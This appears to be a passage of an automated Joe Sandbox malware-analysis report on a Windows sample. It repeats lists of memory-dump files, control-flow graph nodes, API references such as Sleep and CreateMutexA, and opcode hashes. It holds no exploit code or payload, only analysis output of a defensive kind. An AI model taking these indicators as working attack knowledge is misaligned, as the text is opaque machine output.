                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_240000_file.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID: T2*
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-2722087641
                                                                                                                                                                                                                                                                                          • Opcode ID: 056f5632eecad4a4cab295496df8b745bc281e01968efdb65d42ed5a19c3c3fa
                                                                                                                                                                                                                                                                                          • Instruction ID: 0f99a0c4812c31c48315563d85c8f639934552c15000c05fdfdd88460be98e53
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 056f5632eecad4a4cab295496df8b745bc281e01968efdb65d42ed5a19c3c3fa
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 623177716A42048BFB1CDBB8ED89B6DF77AEB82310F248218E414D73D1C77599A48752

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 576 249adc-249ae8 577 249afe-249d91 call 25d663 call 257a00 call 245c10 call 248b30 call 258220 call 257a00 call 245c10 call 248b30 call 258220 576->577 578 249aea-249af8 576->578 578->577 579 24a917 578->579 581 24a953-24a994 Sleep CreateMutexA 579->581 582 24a917 call 276c6a 579->582 587 24a996-24a998 581->587 588 24a9a7-24a9a8 581->588 582->581 587->588 590 24a99a-24a9a5 587->590 590->588
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0024A963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,002A3254), ref: 0024A981
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_240000_file.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID: T2*
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-2722087641
                                                                                                                                                                                                                                                                                          • Opcode ID: a80fc3975874c1c186ea883040e59693b7f1991b5519024d2f98eff85837a503
                                                                                                                                                                                                                                                                                          • Instruction ID: d02e5994ea33c5fae3c3442a7caab4b0846de8c950468115f787248db626b855
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a80fc3975874c1c186ea883040e59693b7f1991b5519024d2f98eff85837a503
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D92179326642009BFB1CDF68FC8972DF365EBC2314F208219E408C72D1DB7599A48A12

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 644 24a856-24a86e 645 24a870-24a87c 644->645 646 24a89c-24a89e 644->646 649 24a892-24a899 call 25d663 645->649 650 24a87e-24a88c 645->650 647 24a8a0-24a8a7 646->647 648 24a8a9-24a8b1 call 247d30 646->648 653 24a8eb-24a916 call 2580c0 647->653 661 24a8e4-24a8e6 648->661 662 24a8b3-24a8bb call 247d30 648->662 649->646 650->649 651 24a94e 650->651 658 24a953-24a987 Sleep CreateMutexA 651->658 659 24a94e call 276c6a 651->659 663 24a98e-24a994 658->663 659->658 661->653 662->661 669 24a8bd-24a8c5 call 247d30 662->669 665 24a996-24a998 663->665 666 24a9a7-24a9a8 663->666 665->666 668 24a99a-24a9a5 665->668 668->666 669->661 673 24a8c7-24a8cf call 247d30 669->673 673->661 676 24a8d1-24a8d9 call 247d30 673->676 676->661 679 24a8db-24a8e2 676->679 679->653
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0024A963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,002A3254), ref: 0024A981
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_240000_file.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID: T2*
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-2722087641
                                                                                                                                                                                                                                                                                          • Opcode ID: 370469fb67a8444e9ec6bc4227e5c2e3d199062189b653e425be663919fe6187
                                                                                                                                                                                                                                                                                          • Instruction ID: b6b1a88bcc9c8ec1a99048954b868d1212cfdff757c7451cd762e1a9cb80f046
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 370469fb67a8444e9ec6bc4227e5c2e3d199062189b653e425be663919fe6187
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA214F716F8102DBFB2CAB78A89A73EB251DF82300F244816F544D62D1CBB959718553

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 621 24a34f-24a35b 622 24a371-24a39a call 25d663 621->622 623 24a35d-24a36b 621->623 629 24a39c-24a3a8 622->629 630 24a3c8-24a916 call 2580c0 622->630 623->622 624 24a93a 623->624 627 24a953-24a994 Sleep CreateMutexA 624->627 628 24a93a call 276c6a 624->628 636 24a996-24a998 627->636 637 24a9a7-24a9a8 627->637 628->627 631 24a3be-24a3c5 call 25d663 629->631 632 24a3aa-24a3b8 629->632 631->630 632->624 632->631 636->637 641 24a99a-24a9a5 636->641 641->637
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0024A963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,002A3254), ref: 0024A981
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_240000_file.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID: T2*
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-2722087641
                                                                                                                                                                                                                                                                                          • Opcode ID: b3ad17ce9b32c9003c686884fb06443c6575f4841d66d0b7807227d21e49c85b
                                                                                                                                                                                                                                                                                          • Instruction ID: 249f1dd8945c1024a1e8ad74eee3ff0a440e62d76b2ba626191a86aec60f3d5a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3ad17ce9b32c9003c686884fb06443c6575f4841d66d0b7807227d21e49c85b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B219B323A42009BFB1CDF68FC8972DFB66DBC2310F248219E804D76D1DB7599A48712
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(?,0024DA1D,?,?,?,?), ref: 002487B9
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
